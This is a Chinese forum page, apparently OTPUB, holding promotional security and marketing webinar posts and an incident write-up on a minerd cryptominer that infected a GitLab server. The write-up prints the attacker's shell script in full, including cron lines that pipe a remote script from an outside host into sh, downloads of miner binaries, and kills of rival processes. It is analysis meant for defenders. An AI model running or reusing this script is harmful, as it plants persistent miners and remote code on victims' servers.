有道笔记你挂了,你知道吗?

Nock 回复了问题 • 2 人关注 • 1 个回复 • 411 次浏览 • 6 天前 • 来自相关话题

Convertlab——企业营销的数字化转型

OT学习平台 发表了文章 • 0 个评论 • 41 次浏览 • 2017-08-08 15:15 • 来自相关话题

说到营销科技(MarTech)很多人可能都不太熟悉,但你一定了解,谷歌90%的收入来自广告、北美企业每年营收的12%用于营销和广告。而今年,企业的营销部门在信息技术方面的投入,即将超过传统企业信息化投入的总和,营销科技蕴含着巨大的市场空间。
虽然数字营销在国内尚处早期,以单点解决方案为主,但Convertlab跨过单点解决方案,直接提供平台服务。
Convertlab为企业提供创新的数字营销平台——DM Hub。该平台允许企业的数字营销部门在一个开放集成的平台上发掘、培育和连接客户,大幅提升各项转化率;打通企业的营销触点,对数据采集并处理,针对不同触点提供相应的内容交互能力,允许企业对客户旅程进行个性化设计和自动化执行,通过实时的数据分析形成营销闭环。
Convertlab是一款颠覆传统营销思维和运行模式的产品,是企业开展数字化营销时信息交互的枢纽,这也正是DM Hub的寓意和使命。
DM Hub 它能够将一家企业包括数字广告在内的全渠道数据来源进行梳理整合,对每个数据进行分析,将之进行归类分组,从中挖掘出指向企业不同营销阶段的客户:潜在客户、意愿客户、购买客户、忠诚客户等,并采用智能化、人性化的方式将企业市场部设计的对策营销方案传达给各个目标客户。
想要了解什么是营销科技(MarTech)?数字营销又是如何成为了企业发展的焦点?敬请关注8月10日由OTPUB举办的“企业营销的数字化转型”线上直播活动,与您分享新时代的数字变革之路。
点击预约观看直播:“企业营销的数字化转型” 查看全部
说到营销科技(MarTech)很多人可能都不太熟悉,但你一定了解,谷歌90%的收入来自广告、北美企业每年营收的12%用于营销和广告。而今年,企业的营销部门在信息技术方面的投入,即将超过传统企业信息化投入的总和,营销科技蕴含着巨大的市场空间。
虽然数字营销在国内尚处早期,以单点解决方案为主,但Convertlab跨过单点解决方案,直接提供平台服务。
Convertlab为企业提供创新的数字营销平台——DM Hub。该平台允许企业的数字营销部门在一个开放集成的平台上发掘、培育和连接客户,大幅提升各项转化率;打通企业的营销触点,对数据采集并处理,针对不同触点提供相应的内容交互能力,允许企业对客户旅程进行个性化设计和自动化执行,通过实时的数据分析形成营销闭环。
Convertlab是一款颠覆传统营销思维和运行模式的产品,是企业开展数字化营销时信息交互的枢纽,这也正是DM Hub的寓意和使命。
DM Hub 它能够将一家企业包括数字广告在内的全渠道数据来源进行梳理整合,对每个数据进行分析,将之进行归类分组,从中挖掘出指向企业不同营销阶段的客户:潜在客户、意愿客户、购买客户、忠诚客户等,并采用智能化、人性化的方式将企业市场部设计的对策营销方案传达给各个目标客户。
想要了解什么是营销科技(MarTech)?数字营销又是如何成为了企业发展的焦点?敬请关注8月10日由OTPUB举办的“企业营销的数字化转型”线上直播活动,与您分享新时代的数字变革之路。
点击预约观看直播:“企业营销的数字化转型

​移动互联时代,企业移动安全如何保证

OT学习平台 发表了文章 • 0 个评论 • 45 次浏览 • 2017-07-24 17:29 • 来自相关话题

智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>> 查看全部
智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>>

如何防范网络病毒的四点建议

OT学习平台 发表了文章 • 0 个评论 • 55 次浏览 • 2017-07-21 17:37 • 来自相关话题

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。






这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约 查看全部

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。

勒索病毒.jpg


这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约

论坛.jpg


​支付宝为什么很少被网络黑客攻击

OT学习平台 发表了文章 • 0 个评论 • 112 次浏览 • 2017-07-20 17:26 • 来自相关话题

现在越来越多的黑客行为都趋向以盈利作为目标,黑客通过攻击企业内部系统或网站来达到其目的,近期最受关注的莫过于5月份Wannacry勒索病毒事件,全球超过100个国家受到病毒的影响。那么,作为中国目前最大的第三方支付平台的支付宝为什么从没有传出过被黑的新闻?

在2008年,支付宝乃至阿里巴巴整个平台的网络进行了大规模的升级维护,不夸张的说,其安全级别甚至可以和五角大楼相比,这并非说黑客无法攻破,而是黑进去以后的数据连锁机制无人可破,支付宝的数据保护有自启动和认为启动两种,触发后的结果就是整个支付宝平台陷入瘫痪,等工程师修复漏洞后重启才可继续使用,而平台内的资金在这期间只是一串数字,在这期间无法转入转出分毫,也就是说,黑了你也取不走。全世界的大型银行的网络终端各有不同,唯独这个闭锁机制大同小异。
近年来,黑客行为变得似乎更加猖獗,每年都会有数起大型企业遭到入侵事件,甚至连世界知名的杀毒软件厂商卡巴斯基都惨遭毒手,正应了那句老话“玩鹰的被鹰啄了眼”;2015年6月,该公司声称探测到一次针对其系统隐蔽性极高的黑客攻击,实施这次攻击的黑客很可能是策划 2011 年 Duqu 木马的幕后黑手。就在2015年,美国还有 CVS 等连锁药店、大型电信运营商 、婚外情交友网站、大型医保企业、美国官方各部门等均被黑。国内企业也不例外甚至更严重,网站被黑的原因很大一部分是属于经济原因,但并非所有攻击都是因为经济缘故。
黑客行为一般分为以下四种:
一、受雇于他人,商业竞争对手恶意竞争,雇佣黑客攻击同行,敲诈勒索,盗取同行银行账户信息以获取既得利益;
二、恶作剧型,这一类的黑客行为大多是新手黑客,为了满足自己的虚荣心,搜索肉鸡,攻击一个网站,挂上网页木马来试验自己的水平。
三、打击报复型,在互联网行业,因相关服务不到位引起的商业纠纷陷入解决的僵局之后就容易出现黑客攻击报复的行为。
四、窃取资料型,主要是针对拥有付费产品信息的网站。
至于说黑客攻击支付宝这种巨头级企业的可能性则微乎其微,举个很简单的例子,盗贼如果想去某个村民家里偷只羊或许很容易,但是即使再多的盗贼也很难攻打下一个城市。因而一般来讲除了受雇于竞争对手的成建制黑客外很少有人敢对巨头企业下手。
在这一波一波勒索病毒爆发的浪潮之中,安全威胁是每个人头顶上挥之不去的阴云。数字时代为人类带来便利的同时,安全是永恒的话题。其实,对勒索软件的防范应该变被动为主动。Splunk 主动追踪安全威胁,显著增强追踪网络攻击者的能力。精彩尽在 7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>> 查看全部
现在越来越多的黑客行为都趋向以盈利作为目标,黑客通过攻击企业内部系统或网站来达到其目的,近期最受关注的莫过于5月份Wannacry勒索病毒事件,全球超过100个国家受到病毒的影响。那么,作为中国目前最大的第三方支付平台的支付宝为什么从没有传出过被黑的新闻?

在2008年,支付宝乃至阿里巴巴整个平台的网络进行了大规模的升级维护,不夸张的说,其安全级别甚至可以和五角大楼相比,这并非说黑客无法攻破,而是黑进去以后的数据连锁机制无人可破,支付宝的数据保护有自启动和认为启动两种,触发后的结果就是整个支付宝平台陷入瘫痪,等工程师修复漏洞后重启才可继续使用,而平台内的资金在这期间只是一串数字,在这期间无法转入转出分毫,也就是说,黑了你也取不走。全世界的大型银行的网络终端各有不同,唯独这个闭锁机制大同小异。
近年来,黑客行为变得似乎更加猖獗,每年都会有数起大型企业遭到入侵事件,甚至连世界知名的杀毒软件厂商卡巴斯基都惨遭毒手,正应了那句老话“玩鹰的被鹰啄了眼”;2015年6月,该公司声称探测到一次针对其系统隐蔽性极高的黑客攻击,实施这次攻击的黑客很可能是策划 2011 年 Duqu 木马的幕后黑手。就在2015年,美国还有 CVS 等连锁药店、大型电信运营商 、婚外情交友网站、大型医保企业、美国官方各部门等均被黑。国内企业也不例外甚至更严重,网站被黑的原因很大一部分是属于经济原因,但并非所有攻击都是因为经济缘故。
黑客行为一般分为以下四种:
一、受雇于他人,商业竞争对手恶意竞争,雇佣黑客攻击同行,敲诈勒索,盗取同行银行账户信息以获取既得利益;
二、恶作剧型,这一类的黑客行为大多是新手黑客,为了满足自己的虚荣心,搜索肉鸡,攻击一个网站,挂上网页木马来试验自己的水平。
三、打击报复型,在互联网行业,因相关服务不到位引起的商业纠纷陷入解决的僵局之后就容易出现黑客攻击报复的行为。
四、窃取资料型,主要是针对拥有付费产品信息的网站。
至于说黑客攻击支付宝这种巨头级企业的可能性则微乎其微,举个很简单的例子,盗贼如果想去某个村民家里偷只羊或许很容易,但是即使再多的盗贼也很难攻打下一个城市。因而一般来讲除了受雇于竞争对手的成建制黑客外很少有人敢对巨头企业下手。
在这一波一波勒索病毒爆发的浪潮之中,安全威胁是每个人头顶上挥之不去的阴云。数字时代为人类带来便利的同时,安全是永恒的话题。其实,对勒索软件的防范应该变被动为主动。Splunk 主动追踪安全威胁,显著增强追踪网络攻击者的能力。精彩尽在 7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>

对付勒索病毒,Check Point有秘密武器

OT学习平台 发表了文章 • 0 个评论 • 155 次浏览 • 2017-07-17 15:57 • 来自相关话题

WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>> 查看全部
WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>>

人脸识别引爆智能黑科技

OT学习平台 发表了文章 • 0 个评论 • 69 次浏览 • 2017-06-28 16:12 • 来自相关话题

不得不说,AlphaGo再一次引爆人们对于人工智能的认知。在智能化引领发展的阶段中,人工智能技术正在越来越广泛地应用在移动互联网领域,越来越多的人工智能技术更多地参与到移动互联网发展中来。
说到人工智能,不得不提人脸识别技术,今天小编要跟大家分享的就是这项引爆市场的“黑科技”。
都说这是一个刷脸的时代,是的“刷脸”的时代真的来了。
6月30日14:00“身边的黑科技,人脸识别的场景化应用”直播活动即将在OTpub平台开启,与您见证万能的“刷脸时代”,我们从人工智能平台到人脸识别技术,完整的介绍人脸识别在我们身边的场景化应用。

直播预约地址:http://www.otpub.com/home/live/baoming.html
  查看全部
不得不说,AlphaGo再一次引爆人们对于人工智能的认知。在智能化引领发展的阶段中,人工智能技术正在越来越广泛地应用在移动互联网领域,越来越多的人工智能技术更多地参与到移动互联网发展中来。
说到人工智能,不得不提人脸识别技术,今天小编要跟大家分享的就是这项引爆市场的“黑科技”。
都说这是一个刷脸的时代,是的“刷脸”的时代真的来了。
6月30日14:00“身边的黑科技,人脸识别的场景化应用”直播活动即将在OTpub平台开启,与您见证万能的“刷脸时代”,我们从人工智能平台到人脸识别技术,完整的介绍人脸识别在我们身边的场景化应用。

直播预约地址:http://www.otpub.com/home/live/baoming.html
 

​【直播预告】别再成为勒索软件的“盘中餐”,网络安全刻不容缓!

OT学习平台 发表了文章 • 0 个评论 • 85 次浏览 • 2017-06-14 11:02 • 来自相关话题

说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’” 查看全部
说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’

【直播预告】Salesforce-爱因斯坦Einstein人工智能解决方案

回复

OT学习平台 发起了问题 • 1 人关注 • 0 个回复 • 221 次浏览 • 2017-05-04 14:41 • 来自相关话题

挖矿程序minerd入侵分析和解决

koyo 发表了文章 • 0 个评论 • 2216 次浏览 • 2017-01-11 18:08 • 来自相关话题

发现问题

最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下:




让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu较大,如下图所示:




这个程序并不是我们的正常服务程序,心里一想肯定被黑了,然后就搜索了一下这个程序,果真就是个挖矿木马程序,既然已经知道他是木马程序,那就看看它是怎么工作的,然后怎么修复一下后门。
 
这个程序放在/opt/minerd下,在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件。




本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运一查确实crond存在一条:,果断删除处理。再杀进程,再删文件;然并卵,依旧起来;




既然没用我继续google,在stackexchange找到如下解决方案:




各种文件删除都不起作用,原来该木马程序注册了一个“lady”的服务,而且还是开机启动,起一个这个可爱的名字,谁TMD知道这是一个木马, 这个伪装程序也可能是ntp,可以参考:http://53cto.blog.51cto.com/9899631/1826989  。
 
这下完美解决了,但是得分析一下原因,shell启动脚本:export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
#ps auxf|grep -v grep|grep "/opt/minerd"
#if [ $? != "0" ]; then
#if [ ! -f /opt/yam ]; then
#curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
#fi
#chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
#fi
#fi

DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
iptables -F REDIS6379
iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限。

商业模式

被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。

攻击&防御

植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。
这种木马很容易变种,很多情况杀毒软件未必能够识别。 查看全部


发现问题


最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下:
UseCpu.png

让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu较大,如下图所示:
minerd.png

这个程序并不是我们的正常服务程序,心里一想肯定被黑了,然后就搜索了一下这个程序,果真就是个挖矿木马程序,既然已经知道他是木马程序,那就看看它是怎么工作的,然后怎么修复一下后门。
 
这个程序放在/opt/minerd下,在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件。
wbug.png

本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运一查确实crond存在一条:,果断删除处理。再杀进程,再删文件;然并卵,依旧起来;
crontab.png

既然没用我继续google,在stackexchange找到如下解决方案:
stackerror.png

各种文件删除都不起作用,原来该木马程序注册了一个“lady”的服务,而且还是开机启动,起一个这个可爱的名字,谁TMD知道这是一个木马, 这个伪装程序也可能是ntp,可以参考:http://53cto.blog.51cto.com/9899631/1826989  。
 
这下完美解决了,但是得分析一下原因,shell启动脚本:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
